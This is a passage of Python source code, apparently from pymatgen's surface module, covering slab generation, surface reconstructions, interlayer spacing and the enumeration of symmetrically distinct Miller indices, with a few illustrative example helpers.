Also stores the initial information needed later on to generate a slab.
Args:
initial_structure (Structure): Initial input structure. Note that to
ensure that the miller indices correspond to usual
crystallographic definitions, you should supply a conventional
unit cell structure.
miller_index ([h, k, l]): Miller index of plane parallel to
surface. Note that this is referenced to the input structure. If
you need this to be based on the conventional cell,
you should supply the conventional structure.
min_slab_size (float): In Angstroms or number of hkl planes
min_vacuum_size (float): In Angstroms or number of hkl planes
lll_reduce (bool): Whether to perform an LLL reduction on the
eventual structure.
center_slab (bool): Whether to center the slab in the cell with
equal vacuum spacing from the top and bottom.
in_unit_planes (bool): Whether to set min_slab_size and min_vac_size
in units of hkl planes (True) or Angstrom (False/default).
Setting in units of planes is useful for ensuring some slabs
have a certain number of layers of atoms. E.g. for Cs (100), a 10 Ang
slab will result in a slab with only 2 layers of atoms, whereas
Fe (100) will have more layers of atoms. By using units of hkl
planes instead, we ensure both slabs
have the same number of atoms. The slab thickness will be in
min_slab_size/math.ceil(self._proj_height/dhkl)
multiples of oriented unit cells.
primitive (bool): Whether to reduce any generated slabs to a
primitive cell (this does **not** mean the slab is generated
from a primitive cell, it simply means that after slab
generation, we attempt to find shorter lattice vectors,
which lead to less surface area and smaller cells).
max_normal_search (int): If set to a positive integer, the code will
conduct a search for a normal lattice vector that is as
perpendicular to the surface as possible by considering
multiple linear combinations of lattice vectors up to
max_normal_search. This has no bearing on surface energies,
but may be useful as a preliminary step to generating slabs
for adsorption and other purposes. It is typical that this will
not be the smallest possible cell for simulation. Normality
is not guaranteed, but the oriented cell will have the c
vector as normal as possible (within the search range) to the
surface. A value of up to the max absolute Miller index is
usually sufficient.
reorient_lattice (bool): reorients the lattice parameters such that
the c direction is the third vector of the lattice matrix
"""
# Add Wyckoff symbols of the bulk, will help with
# identifying types of sites in the slab system
sg = SpacegroupAnalyzer(initial_structure)
initial_structure.add_site_property("bulk_wyckoff",
sg.get_symmetry_dataset()['wyckoffs'])
initial_structure.add_site_property("bulk_equivalent",
sg.get_symmetry_dataset()['equivalent_atoms'])
latt = initial_structure.lattice
miller_index = reduce_vector(miller_index)
# Calculate the surface normal using the reciprocal lattice vector.
recp = latt.reciprocal_lattice_crystallographic
normal = recp.get_cartesian_coords(miller_index)
normal /= np.linalg.norm(normal)
slab_scale_factor = []
non_orth_ind = []
eye = np.eye(3, dtype=int)  # plain int; np.int was removed in recent numpy
for i, j in enumerate(miller_index):
if j == 0:
# Lattice vector is perpendicular to surface normal, i.e.,
# in plane of surface. We will simply choose this lattice
# vector as one of the basis vectors.
slab_scale_factor.append(eye[i])
else:
# Calculate projection of lattice vector onto surface normal.
d = abs(np.dot(normal, latt.matrix[i])) / latt.abc[i]
non_orth_ind.append((i, d))
# We want the vector that has maximum magnitude in the
# direction of the surface normal as the c-direction.
# Results in a more "orthogonal" unit cell.
c_index, dist = max(non_orth_ind, key=lambda t: t[1])
if len(non_orth_ind) > 1:
lcm_miller = lcm(*[miller_index[i] for i, d in non_orth_ind])
for (i, di), (j, dj) in itertools.combinations(non_orth_ind, 2):
l = [0, 0, 0]
l[i] = -int(round(lcm_miller / miller_index[i]))
l[j] = int(round(lcm_miller / miller_index[j]))
slab_scale_factor.append(l)
if len(slab_scale_factor) == 2:
break
if max_normal_search is None:
slab_scale_factor.append(eye[c_index])
else:
index_range = sorted(
reversed(range(-max_normal_search, max_normal_search + 1)),
key=lambda x: abs(x))
candidates = []
for uvw in itertools.product(index_range, index_range, index_range):
if (not any(uvw)) or abs(
np.linalg.det(slab_scale_factor + [uvw])) < 1e-8:
continue
vec = latt.get_cartesian_coords(uvw)
l = np.linalg.norm(vec)
cosine = abs(np.dot(vec, normal) / l)
candidates.append((uvw, cosine, l))
if abs(abs(cosine) - 1) < 1e-8:
# If cosine of 1 is found, no need to search further.
break
# We want the indices with the maximum absolute cosine,
# but smallest possible length.
uvw, cosine, l = max(candidates, key=lambda x: (x[1], -x[2]))
slab_scale_factor.append(uvw)
slab_scale_factor = np.array(slab_scale_factor)
# Let's make sure we have a right-handed crystallographic system (det > 0)
if np.linalg.det(slab_scale_factor) < 0:
slab_scale_factor *= -1
# Make sure the slab_scale_factor is reduced to avoid
# unnecessarily large slabs
reduced_scale_factor = [reduce_vector(v) for v in slab_scale_factor]
slab_scale_factor = np.array(reduced_scale_factor)
single = initial_structure.copy()
single.make_supercell(slab_scale_factor)
# When getting the OUC, let's return the most reduced
# structure possible to reduce calculations
self.oriented_unit_cell = Structure.from_sites(single,
to_unit_cell=True)
self.max_normal_search = max_normal_search
self.parent = initial_structure
self.lll_reduce = lll_reduce
self.center_slab = center_slab
self.slab_scale_factor = slab_scale_factor
self.miller_index = miller_index
self.min_vac_size = min_vacuum_size
self.min_slab_size = min_slab_size
self.in_unit_planes = in_unit_planes
self.primitive = primitive
self._normal = normal
a, b, c = self.oriented_unit_cell.lattice.matrix
self._proj_height = abs(np.dot(normal, c))
self.reorient_lattice = reorient_lattice
def get_slab(self, shift=0, tol=0.1, energy=None):
"""
This method takes in a shift value for the c lattice direction and
generates a slab based on the given shift. You should rarely use this
method. Instead, it is used by other generation algorithms to obtain
all slabs.
Arg:
shift (float): A shift value in Angstrom that determines how much a
slab should be shifted.
tol (float): Tolerance to determine primitive cell.
energy (float): An energy to assign to the slab.
Returns:
(Slab) A Slab object with a particular shifted oriented unit cell.
"""
h = self._proj_height
p = round(h/self.parent.lattice.d_hkl(self.miller_index), 8)
if self.in_unit_planes:
nlayers_slab = int(math.ceil(self.min_slab_size / p))
nlayers_vac = int(math.ceil(self.min_vac_size / p))
else:
nlayers_slab = int(math.ceil(self.min_slab_size / h))
nlayers_vac = int(math.ceil(self.min_vac_size / h))
nlayers = nlayers_slab + nlayers_vac
species = self.oriented_unit_cell.species_and_occu
props = self.oriented_unit_cell.site_properties
props = {k: v * nlayers_slab for k, v in props.items()}
frac_coords = self.oriented_unit_cell.frac_coords
frac_coords = np.array(frac_coords) + np.array([0, 0, -shift])[None, :]
frac_coords -= np.floor(frac_coords)
a, b, c = self.oriented_unit_cell.lattice.matrix
new_lattice = [a, b, nlayers * c]
frac_coords[:, 2] = frac_coords[:, 2] / nlayers
all_coords = []
for i in range(nlayers_slab):
fcoords = frac_coords.copy()
fcoords[:, 2] += i / nlayers
all_coords.extend(fcoords)
slab = Structure(new_lattice, species * nlayers_slab, all_coords,
site_properties=props)
scale_factor = self.slab_scale_factor
# Whether or not to orthogonalize the structure
if self.lll_reduce:
lll_slab = slab.copy(sanitize=True)
mapping = lll_slab.lattice.find_mapping(slab.lattice)
scale_factor = np.dot(mapping[2], scale_factor)
slab = lll_slab
# Whether or not to center the slab layer around the vacuum
if self.center_slab:
avg_c = np.average([c[2] for c in slab.frac_coords])
slab.translate_sites(list(range(len(slab))), [0, 0, 0.5 - avg_c])
if self.primitive:
prim = slab.get_primitive_structure(tolerance=tol)
if energy is not None:
energy = prim.volume / slab.volume * energy
slab = prim
# Reorient the lattice to get the correct reduced cell
ouc = self.oriented_unit_cell.copy()
if self.primitive:
# Find a reduced ouc
slab_l = slab.lattice
ouc = ouc.get_primitive_structure(constrain_latt={"a": slab_l.a, "b": slab_l.b,
"alpha": slab_l.alpha,
"beta": slab_l.beta,
"gamma": slab_l.gamma})
return Slab(slab.lattice, slab.species_and_occu,
slab.frac_coords, self.miller_index,
ouc, shift, scale_factor, energy=energy,
site_properties=slab.site_properties,
reorient_lattice=self.reorient_lattice)
def _calculate_possible_shifts(self, tol=0.1):
frac_coords = self.oriented_unit_cell.frac_coords
n = len(frac_coords)
if n == 1:
# Clustering does not work when there is only one data point.
shift = frac_coords[0][2] + 0.5
return [shift - math.floor(shift)]
# We cluster the sites according to the c coordinates. But we need to
# take into account PBC. Let's compute a fractional c-coordinate
# distance matrix that accounts for PBC.
dist_matrix = np.zeros((n, n))
h = self._proj_height
# Projection of c lattice vector in
# direction of surface normal.
for i, j in itertools.combinations(list(range(n)), 2):
if i != j:
cdist = frac_coords[i][2] - frac_coords[j][2]
cdist = abs(cdist - round(cdist)) * h
dist_matrix[i, j] = cdist
dist_matrix[j, i] = cdist
condensed_m = squareform(dist_matrix)
z = linkage(condensed_m)
clusters = fcluster(z, tol, criterion="distance")
# Generate dict of cluster# to c val - doesn't matter what the c is.
c_loc = {c: frac_coords[i][2] for i, c in enumerate(clusters)}
# Put all c into the unit cell.
possible_c = [c - math.floor(c) for c in sorted(c_loc.values())]
# Calculate the shifts
nshifts = len(possible_c)
shifts = []
for i in range(nshifts):
if i == nshifts - 1:
# There is an additional shift between the first and last c
# coordinate. But this needs special handling because of PBC.
shift = (possible_c[0] + 1 + possible_c[i]) * 0.5
if shift > 1:
shift -= 1
else:
shift = (possible_c[i] + possible_c[i + 1]) * 0.5
shifts.append(shift - math.floor(shift))
shifts = sorted(shifts)
return shifts
def _get_c_ranges(self, bonds):
c_ranges = set()
bonds = {(get_el_sp(s1), get_el_sp(s2)): dist for (s1, s2), dist in
bonds.items()}
for (sp1, sp2), bond_dist in bonds.items():
for site in self.oriented_unit_cell:
if sp1 in site.species:
for nn, d in self.oriented_unit_cell.get_neighbors(
site, bond_dist):
if sp2 in nn.species:
c_range = tuple(sorted([site.frac_coords[2],
nn.frac_coords[2]]))
if c_range[1] > 1:
# Takes care of PBC when c coordinate of site
# goes beyond the upper boundary of the cell
c_ranges.add((c_range[0], 1))
c_ranges.add((0, c_range[1] - 1))
elif c_range[0] < 0:
# Takes care of PBC when c coordinate of site
# is below the lower boundary of the unit cell
c_ranges.add((0, c_range[1]))
c_ranges.add((c_range[0] + 1, 1))
elif c_range[0] != c_range[1]:
c_ranges.add(c_range)
return c_ranges
def get_slabs(self, bonds=None, ftol=0.1, tol=0.1, max_broken_bonds=0,
symmetrize=False, repair=False):
"""
This method returns a list of slabs that are generated using the list of
shift values from the method, _calculate_possible_shifts(). Before the
shifts are used to create the slabs however, if the user decides to take
into account whether or not a termination will break any polyhedral
structure (bonds is not None), this method will filter out any shift
values that do so.
Args:
bonds ({(specie1, specie2): max_bond_dist}: bonds are
specified as a dict of tuples: float of specie1, specie2
and the max bonding distance. For example, PO4 groups may be
defined as {("P", "O"): 3}.
tol (float): General tolerance parameter for getting primitive
cells and matching structures.
ftol (float): Threshold parameter in fcluster in order to check
if two atoms are lying on the same plane. Default thresh set
to 0.1 Angstrom in the direction of the surface normal.
max_broken_bonds (int): Maximum number of allowable broken bonds
for the slab. Use this to limit # of slabs (some structures
may have a lot of slabs). Defaults to zero, which means no
defined bonds must be broken.
symmetrize (bool): Whether or not to ensure the surfaces of the
slabs are equivalent.
repair (bool): Whether to repair terminations with broken bonds
or just omit them. Set to False as repairing terminations can
lead to many possible slabs as opposed to just omitting them.
Returns:
([Slab]) List of all possible terminations of a particular surface.
Slabs are sorted by the # of bonds broken.
"""
c_ranges = set() if bonds is None else self._get_c_ranges(bonds)
slabs = []
for shift in self._calculate_possible_shifts(tol=ftol):
bonds_broken = 0
for r in c_ranges:
if r[0] <= shift <= r[1]:
bonds_broken += 1
slab = self.get_slab(shift, tol=tol, energy=bonds_broken)
if bonds_broken <= max_broken_bonds:
slabs.append(slab)
elif repair:
# If the number of broken bonds is exceeded,
# we repair the broken bonds on the slab
slabs.append(self.repair_broken_bonds(slab, bonds))
# Further filters out any surfaces made that might be the same
m = StructureMatcher(ltol=tol, stol=tol, primitive_cell=False,
scale=False)
new_slabs = []
for g in m.group_structures(slabs):
# For each unique termination, symmetrize the
# surfaces by removing sites from the bottom.
if symmetrize:
slabs = self.nonstoichiometric_symmetrized_slab(g[0])
new_slabs.extend(slabs)
else:
new_slabs.append(g[0])
match = StructureMatcher(ltol=tol, stol=tol, primitive_cell=False,
scale=False)
new_slabs = [g[0] for g in match.group_structures(new_slabs)]
return sorted(new_slabs, key=lambda s: s.energy)
def repair_broken_bonds(self, slab, bonds):
"""
This method will find undercoordinated atoms due to slab
cleaving specified by the bonds parameter and move them
to the other surface to make sure the bond is kept intact.
In a future release of surface.py, the ghost_sites will be
used to tell us what the repaired bonds should look like.
Arg:
slab (structure): A structure object representing a slab.
bonds ({(specie1, specie2): max_bond_dist}: bonds are
specified as a dict of tuples: float of specie1, specie2
and the max bonding distance. For example, PO4 groups may be
defined as {("P", "O"): 3}.
Returns:
(Slab) A Slab object with a particular shifted oriented unit cell.
"""
for pair in bonds.keys():
blength = bonds[pair]
# First lets determine which element should be the
# reference (center element) to determine broken bonds.
# e.g. P for a PO4 bond. Find integer coordination
# numbers of the pair of elements wrt to each other
cn_dict = {}
for i, el in enumerate(pair):
cnlist = []
for site in self.oriented_unit_cell:
poly_coord = 0
if site.species_string == el:
for nn in self.oriented_unit_cell.get_neighbors(
site, blength):
if nn[0].species_string == pair[i-1]:
poly_coord += 1
cnlist.append(poly_coord)
cn_dict[el] = cnlist
# We make the element with the higher coordination our reference
if max(cn_dict[pair[0]]) > max(cn_dict[pair[1]]):
element1, element2 = pair
else:
element2, element1 = pair
for i, site in enumerate(slab):
# Determine the coordination of our reference
if site.species_string == element1:
poly_coord = 0
for neighbor in slab.get_neighbors(site, blength):
poly_coord += 1 if neighbor[0].species_string == element2 else 0
# suppose we find an undercoordinated reference atom
if poly_coord not in cn_dict[element1]:
# We get the reference atom of the broken bonds
# (undercoordinated), move it to the other surface
slab = self.move_to_other_side(slab, [i])
# find its NNs with the corresponding
# species it should be coordinated with
neighbors = slab.get_neighbors(slab[i], blength,
include_index=True)
tomove = [nn[2] for nn in neighbors if
nn[0].species_string == element2]
tomove.append(i)
# and then move those NNs along with the central
# atom back to the other side of the slab again
slab = self.move_to_other_side(slab, tomove)
return slab
def move_to_other_side(self, init_slab, index_of_sites):
"""
This method will move a set of sites to the
other side of the slab (opposite surface).
Arg:
init_slab (structure): A structure object representing a slab.
index_of_sites (list of ints): The list of indices representing
the sites we want to move to the other side.
Returns:
(Slab) A Slab object with a particular shifted oriented unit cell.
"""
slab = init_slab.copy()
# Determine what fraction the slab is of the total cell size
# in the c direction. Round to nearest rational number.
h = self._proj_height
p = h/self.parent.lattice.d_hkl(self.miller_index)
if self.in_unit_planes:
nlayers_slab = int(math.ceil(self.min_slab_size / p))
nlayers_vac = int(math.ceil(self.min_vac_size / p))
else:
nlayers_slab = int(math.ceil(self.min_slab_size / h))
nlayers_vac = int(math.ceil(self.min_vac_size / h))
nlayers = nlayers_slab + nlayers_vac
slab_ratio = nlayers_slab / nlayers
# Sort the index of sites based on which side they are on
top_site_index = [ i for i in index_of_sites if
slab[i].frac_coords[2] > slab.center_of_mass[2]]
bottom_site_index = [ i for i in index_of_sites if
slab[i].frac_coords[2] < slab.center_of_mass[2]]
# Translate sites to the opposite surfaces
slab.translate_sites(top_site_index, [0, 0, slab_ratio])
slab.translate_sites(bottom_site_index, [0, 0, -slab_ratio])
return Slab(init_slab.lattice, slab.species, slab.frac_coords,
init_slab.miller_index, init_slab.oriented_unit_cell,
init_slab.shift, init_slab.scale_factor,
energy=init_slab.energy)
def nonstoichiometric_symmetrized_slab(self, init_slab, tol=1e-3):
"""
This method checks whether or not the two surfaces of the slab are
equivalent. If the point group of the slab has an inversion symmetry (
i.e. belongs to one of the Laue groups), then it is assumed that the
surfaces should be equivalent. Otherwise, sites at the bottom of the
slab will be removed until the slab is symmetric. Note the removal of sites
can destroy the stoichiometry of the slab. For non-elemental
structures, the chemical potential will be needed to calculate surface energy.
Arg:
init_slab (Structure): A single slab structure
tol (float): Tolerance for SpacegroupAnalyzer.
Returns:
Slab (structure): A symmetrized Slab object.
"""
sg = SpacegroupAnalyzer(init_slab, symprec=tol)
if sg.is_laue():
return [init_slab]
nonstoich_slabs = []
# Build an equivalent surface slab for each of the different surfaces
for top in [True, False]:
asym = True
slab = init_slab.copy()
slab.energy = init_slab.energy
while asym:
# Keep removing sites from the bottom one by one until both
# surfaces are symmetric or the slab has been thinned down to
# no more atoms than in the parent structure
c_dir = [site[2] for i, site in enumerate(slab.frac_coords)]
if top:
slab.remove_sites([c_dir.index(max(c_dir))])
else:
slab.remove_sites([c_dir.index(min(c_dir))])
if len(slab) <= len(self.parent):
break
# Check if the altered surface is symmetric
sg = SpacegroupAnalyzer(slab, symprec=tol)
if sg.is_laue():
asym = False
nonstoich_slabs.append(slab)
if len(slab) <= len(self.parent):
warnings.warn("Too many sites removed, please use a larger slab "
"size.")
return nonstoich_slabs
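# Illustrative sketch (not part of the original module): a hedged example of
# the typical SlabGenerator workflow described in the docstrings above. The
# rocksalt NaCl cell, its 5.69 A lattice parameter and the 10 A slab/vacuum
# sizes are assumptions for illustration only; the helper is never called at
# import time.
def _example_slabgenerator_workflow():
    from pymatgen.core.lattice import Lattice
    from pymatgen.core.structure import Structure
    nacl = Structure.from_spacegroup("Fm-3m", Lattice.cubic(5.69),
                                     ["Na", "Cl"],
                                     [[0, 0, 0], [0.5, 0.5, 0.5]])
    gen = SlabGenerator(nacl, (1, 0, 0), min_slab_size=10, min_vacuum_size=10,
                        center_slab=True, lll_reduce=True)
    # One Slab per symmetrically distinct termination of the (100) surface
    slabs = gen.get_slabs()
    return slabs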
module_dir = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(module_dir,
"reconstructions_archive.json")) as data_file:
reconstructions_archive = json.load(data_file)
class ReconstructionGenerator:
"""
This class takes in a pre-defined dictionary specifying the parameters
needed to build a reconstructed slab, such as the SlabGenerator parameters,
transformation matrix, sites to remove/add and slab/vacuum size. It will
then use the formatted instructions provided by the dictionary to build
the desired reconstructed slab from the initial structure.
.. attribute:: slabgen_params
Parameters for the SlabGenerator
.. attribute:: trans_matrix
A 3x3 transformation matrix to generate the reconstructed
slab. Only the a and b lattice vectors are actually
changed while the c vector remains the same. This
matrix is what the Wood's notation is based on.
.. attribute:: reconstruction_json
The full json or dictionary containing the instructions
for building the reconstructed slab
.. attribute:: termination
The index of the termination of the slab
TODO:
- Right now there is no way to specify what atom is being
added. In the future, use basis sets?
"""
def __init__(self, initial_structure, min_slab_size,
min_vacuum_size, reconstruction_name):
"""
Generates reconstructed slabs from a set of instructions
specified by a dictionary or json file.
Args:
initial_structure (Structure): Initial input structure. Note
that to ensure that the miller indices correspond to usual
crystallographic definitions, you should supply a conventional
unit cell structure.
min_slab_size (float): In Angstroms
min_vacuum_size (float): In Angstroms
reconstruction_name (str): Name of the dict containing the instructions
for building a reconstructed slab. The dictionary can contain
any item the creator deems relevant; however, any instructions
archived in pymatgen for public use need to contain the
following keys and items to ensure compatibility with the
ReconstructionGenerator:
"name" (str): A descriptive name for the type of
reconstruction. Typically the name will have the type
of structure the reconstruction is for, the Miller
index, and Wood's notation along with anything to
describe the reconstruction: e.g.:
"fcc_110_missing_row_1x2"
"description" (str): A longer description of your
reconstruction. This is to help future contributors who
want to add other types of reconstructions to the
archive on pymatgen to check if the reconstruction
already exists. Please read the descriptions carefully
before adding a new type of reconstruction to ensure it
is not in the archive yet.
"reference" (str): Optional reference to where the
reconstruction was taken from or first observed.
"spacegroup" (dict): e.g. {"symbol": "Fm-3m", "number": 225}
Indicates what kind of structure is this reconstruction.
"miller_index" ([h,k,l]): Miller index of your reconstruction
"Woods_notation" (str): For a reconstruction, the a and b
lattice may change to accommodate the symmetry of the
reconstruction. This notation indicates the change in
the vectors relative to the primitive (p) or
conventional (c) slab cell. E.g. p(2x1):
Wood, E. A. (1964). Vocabulary of surface
crystallography. Journal of Applied Physics, 35(4),
1306–1312.
"transformation_matrix" (numpy array): A 3x3 matrix to
transform the slab. Only the a and b lattice vectors
should change while the c vector remains the same.
"SlabGenerator_parameters" (dict): A dictionary containing
the parameters for the SlabGenerator class excluding the
miller_index, min_slab_size and min_vac_size as the
Miller index is already specified and the min_slab_size
and min_vac_size can be changed regardless of what type
of reconstruction is used. Having a consistent set of
SlabGenerator parameters allows for the instructions to
be reused to consistently build a reconstructed slab.
"points_to_remove" (list of coords): A list of sites to
remove where the first two indices are fraction (in a
and b) and the third index is in units of 1/d (in c).
"points_to_add" (list of frac_coords): A list of sites to add
where the first two indices are fraction (in a an b) and
the third index is in units of 1/d (in c).
"base_reconstruction" (dict): Option to base a reconstruction on
an existing reconstruction model also exists to easily build
the instructions without repeating previous work. E.g. the
alpha reconstruction of halites is based on the octopolar
reconstruction but with the topmost atom removed. The dictionary
for the alpha reconstruction would therefore contain the item
"reconstruction_base": "halite_111_octopolar_2x2", and
additional sites for "points_to_remove" and "points_to_add"
can be added to modify this reconstruction.
For "points_to_remove" and "points_to_add", the third index for
the c vector is in units of 1/d where d is the spacing
between atoms along hkl (the c vector) and is relative to
the topmost site in the unreconstructed slab. e.g. a point
of [0.5, 0.25, 1] corresponds to the 0.5 frac_coord of a,
0.25 frac_coord of b and a distance of 1 atomic layer above
the topmost site, while [0.5, 0.25, -0.5]
corresponds to a point half an atomic layer below the topmost
site. [0.5, 0.25, 0] corresponds to a point in the same
position along c as the topmost site. This is done because
while the primitive units of a and b will remain constant,
the user can vary the length of the c direction by changing
the slab layer or the vacuum layer.
NOTE: THE DICTIONARY SHOULD ONLY CONTAIN "points_to_remove" AND
"points_to_add" FOR THE TOP SURFACE. THE ReconstructionGenerator
WILL MODIFY THE BOTTOM SURFACE ACCORDINGLY TO RETURN A SLAB WITH
EQUIVALENT SURFACES.
"""
if reconstruction_name not in reconstructions_archive.keys():
raise KeyError("The reconstruction_name entered (%s) does not exist in the "
"archive. Please select from one of the following reconstructions: %s "
"or add the appropriate dictionary to the archive file "
"reconstructions_archive.json." %(reconstruction_name,
list(reconstructions_archive.keys())))
# Get the instructions to build the reconstruction
# from the reconstruction_archive
recon_json = copy.deepcopy(reconstructions_archive[reconstruction_name])
new_points_to_add, new_points_to_remove = [], []
if "base_reconstruction" in recon_json.keys():
if "points_to_add" in recon_json.keys():
new_points_to_add = recon_json["points_to_add"]
if "points_to_remove" in recon_json.keys():
new_points_to_remove = recon_json["points_to_remove"]
# Build new instructions from a base reconstruction
recon_json = copy.deepcopy(reconstructions_archive[recon_json["base_reconstruction"]])
if "points_to_add" in recon_json.keys():
del recon_json["points_to_add"]
if "points_to_remove" in recon_json.keys():
del recon_json["points_to_remove"]
if new_points_to_add:
recon_json["points_to_add"] = new_points_to_add
if new_points_to_remove:
recon_json["points_to_remove"] = new_points_to_remove
slabgen_params = copy.deepcopy(recon_json["SlabGenerator_parameters"])
slabgen_params["initial_structure"] = initial_structure.copy()
slabgen_params["miller_index"] = recon_json["miller_index"]
slabgen_params["min_slab_size"] = min_slab_size
slabgen_params["min_vacuum_size"] = min_vacuum_size
self.slabgen_params = slabgen_params
self.trans_matrix = recon_json["transformation_matrix"]
self.reconstruction_json = recon_json
self.name = reconstruction_name
def build_slabs(self):
"""
Builds the reconstructed slab by:
(1) Obtaining the unreconstructed slab using the specified
parameters for the SlabGenerator.
(2) Applying the appropriate lattice transformation in the
a and b lattice vectors.
(3) Removing any specified sites from both surfaces.
(4) Adding any specified sites to both surfaces.
Returns:
([Slab]): The list of reconstructed slabs.
"""
slabs = self.get_unreconstructed_slabs()
recon_slabs = []
for slab in slabs:
d = get_d(slab)
top_site = sorted(slab, key=lambda site: site.frac_coords[2])[-1].coords
# Remove any specified sites
if "points_to_remove" in self.reconstruction_json.keys():
pts_to_rm = copy.deepcopy(self.reconstruction_json["points_to_remove"])
for p in pts_to_rm:
p[2] = slab.lattice.get_fractional_coords([top_site[0], top_site[1],
top_site[2]+p[2]*d])[2]
cart_point = slab.lattice.get_cartesian_coords(p)
dist = [site.distance_from_point(cart_point) for site in slab]
site1 = dist.index(min(dist))
slab.symmetrically_remove_atoms([site1])
# Add any specified sites
if "points_to_add" in self.reconstruction_json.keys():
pts_to_add = copy.deepcopy(self.reconstruction_json["points_to_add"])
for p in pts_to_add:
p[2] = slab.lattice.get_fractional_coords([top_site[0], top_site[1],
top_site[2]+p[2]*d])[2]
slab.symmetrically_add_atom(slab[0].specie, p)
slab.reconstruction = self.name
setattr(slab, "recon_trans_matrix", self.trans_matrix)
# Get the oriented_unit_cell with the same axb area.
ouc = slab.oriented_unit_cell.copy()
ouc.make_supercell(self.trans_matrix)
slab.oriented_unit_cell = ouc
recon_slabs.append(slab)
return recon_slabs
def get_unreconstructed_slabs(self):
"""
Generates the unreconstructed or pristine super slab.
"""
slabs = []
for slab in SlabGenerator(**self.slabgen_params).get_slabs():
slab.make_supercell(self.trans_matrix)
slabs.append(slab)
return slabs
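# Illustrative sketch (not part of the original module): a hedged example of
# driving the ReconstructionGenerator. The "fcc_110_missing_row_1x2" name is
# taken from the docstring above and is assumed to be present in
# reconstructions_archive.json; the fcc Ni cell and the 10 A sizes are
# illustrative assumptions. The helper is never called at import time.
def _example_reconstruction():
    from pymatgen.core.lattice import Lattice
    from pymatgen.core.structure import Structure
    ni = Structure.from_spacegroup("Fm-3m", Lattice.cubic(3.52),
                                   ["Ni"], [[0, 0, 0]])
    recon = ReconstructionGenerator(ni, min_slab_size=10, min_vacuum_size=10,
                                    reconstruction_name="fcc_110_missing_row_1x2")
    # One reconstructed Slab per termination of the pristine (110) slab
    return recon.build_slabs()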
def get_d(slab):
"""
Determine the spacing between
layers of atoms along c
"""
sorted_sites = sorted(slab, key=lambda site: site.frac_coords[2])
for i, site in enumerate(sorted_sites):
if "%.6f" % (site.frac_coords[2]) == \
"%.6f" % (sorted_sites[i + 1].frac_coords[2]):
continue
else:
d = abs(site.frac_coords[2] - \
sorted_sites[i + 1].frac_coords[2])
break
return slab.lattice.get_cartesian_coords([0, 0, d])[2]
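# Illustrative sketch (not part of the original module): get_d reports the
# cartesian spacing, along c, between the two lowest distinct atomic layers of
# a slab. The Cu (1, 1, 1) slab below is an illustrative assumption; the
# helper is never called at import time.
def _example_get_d():
    from pymatgen.core.lattice import Lattice
    from pymatgen.core.structure import Structure
    cu = Structure(Lattice.cubic(3.6), ["Cu"] * 4,
                   [[0, 0, 0], [0.5, 0.5, 0], [0.5, 0, 0.5], [0, 0.5, 0.5]])
    slab = SlabGenerator(cu, (1, 1, 1), 10, 10).get_slab()
    return get_d(slab)  # interlayer spacing in Angstroms along c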
def get_recp_symmetry_operation(structure, symprec=0.01):
"""
Find the symmetry operations of the reciprocal lattice,
to be used for hkl transformations
Args:
structure (Structure): conventional unit cell
symprec: Symmetry precision. Default is 0.01.
"""
recp_lattice = structure.lattice.reciprocal_lattice_crystallographic
# get symmetry operations from input conventional unit cell
# Need to make sure recp lattice is big enough, otherwise symmetry
# determination will fail. We set the overall volume to 1.
recp_lattice = recp_lattice.scale(1)
recp = Structure(recp_lattice, ["H"], [[0, 0, 0]])
# Get the symmetry operations of the reciprocal lattice; these are used
# to find Miller indices that would give repetitive (equivalent) slabs
analyzer = SpacegroupAnalyzer(recp, symprec=symprec)
recp_symmops = analyzer.get_symmetry_operations()
return recp_symmops
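# Illustrative sketch (not part of the original module): the reciprocal-lattice
# symmetry operations returned above act directly on Miller indices, which is
# how equivalent (hkl) planes are detected elsewhere in this module. The
# diamond-Si cell is an illustrative assumption; the helper is never called at
# import time.
def _example_recp_symmops():
    from pymatgen.core.lattice import Lattice
    from pymatgen.core.structure import Structure
    si = Structure.from_spacegroup("Fd-3m", Lattice.cubic(5.43),
                                   ["Si"], [[0, 0, 0]])
    ops = get_recp_symmetry_operation(si)
    # Operating on (1, 0, 0) enumerates its symmetry-equivalent Miller indices
    equivalent = {tuple(int(round(i)) for i in op.operate((1, 0, 0)))
                  for op in ops}
    return equivalent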
def get_symmetrically_distinct_miller_indices(structure, max_index):
"""
Returns all symmetrically distinct indices below a certain max-index for
a given structure. Analysis is based on the symmetry of the reciprocal
lattice of the structure.
Args:
structure (Structure): input structure.
max_index (int): The maximum index. For example, a max_index of 1
means that (100), (110), and (111) are returned for the cubic
structure. All other indices are equivalent to one of these.
"""
r = list(range(-max_index, max_index + 1))
r.reverse()
# First we get a list of all hkls for conventional (including equivalent)
conv_hkl_list = [miller for miller in itertools.product(r, r, r) if any([i != 0 for i in miller])]
sg = SpacegroupAnalyzer(structure)
# Get distinct hkl planes from the rhombohedral setting if trigonal
if sg.get_crystal_system() == "trigonal":
transf = sg.get_conventional_to_primitive_transformation_matrix()
miller_list = [hkl_transformation(transf, hkl) for hkl in conv_hkl_list]
prim_structure = SpacegroupAnalyzer(structure).get_primitive_standard_structure()
symm_ops = get_recp_symmetry_operation(prim_structure)
else:
miller_list = conv_hkl_list
symm_ops = get_recp_symmetry_operation(structure)
unique_millers, unique_millers_conv = [], []
def is_already_analyzed(miller_index):
for op in symm_ops:
if in_coord_list(unique_millers, op.operate(miller_index)):
return True
return False
for i, miller in enumerate(miller_list):
d = abs(reduce(gcd, miller))
miller = tuple([int(i / d) for i in miller])
if not is_already_analyzed(miller):
if sg.get_crystal_system() == "trigonal":
# Now we find the distinct primitive hkls using
# the primitive symmetry operations and their
# corresponding hkls in the conventional setting
unique_millers.append(miller)
d = abs(reduce(gcd, conv_hkl_list[i]))
cmiller = tuple([int(i / d) for i in conv_hkl_list[i]])
unique_millers_conv.append(cmiller)
else:
unique_millers.append(miller)
unique_millers_conv.append(miller)
return unique_millers_conv
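# Illustrative sketch (not part of the original module): for a cubic structure
# and max_index=1, the function should reduce the candidate (hkl) triplets to
# the three distinct families mentioned in the docstring, roughly
# {(1, 0, 0), (1, 1, 0), (1, 1, 1)}. The fcc Cu cell is an illustrative
# assumption; the helper is never called at import time.
def _example_distinct_millers():
    from pymatgen.core.lattice import Lattice
    from pymatgen.core.structure import Structure
    cu = Structure(Lattice.cubic(3.6), ["Cu"] * 4,
                   [[0, 0, 0], [0.5, 0.5, 0], [0.5, 0, 0.5], [0, 0.5, 0.5]])
    return get_symmetrically_distinct_miller_indices(cu, 1)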
def hkl_transformation(transf, miller_index):
"""
Returns the Miller index from setting
A to B using a transformation matrix
Args:
transf (3x3 array): The transformation matrix
that transforms a lattice of A to B
miller_index ([h, k, l]): Miller index to transform to setting B
"""
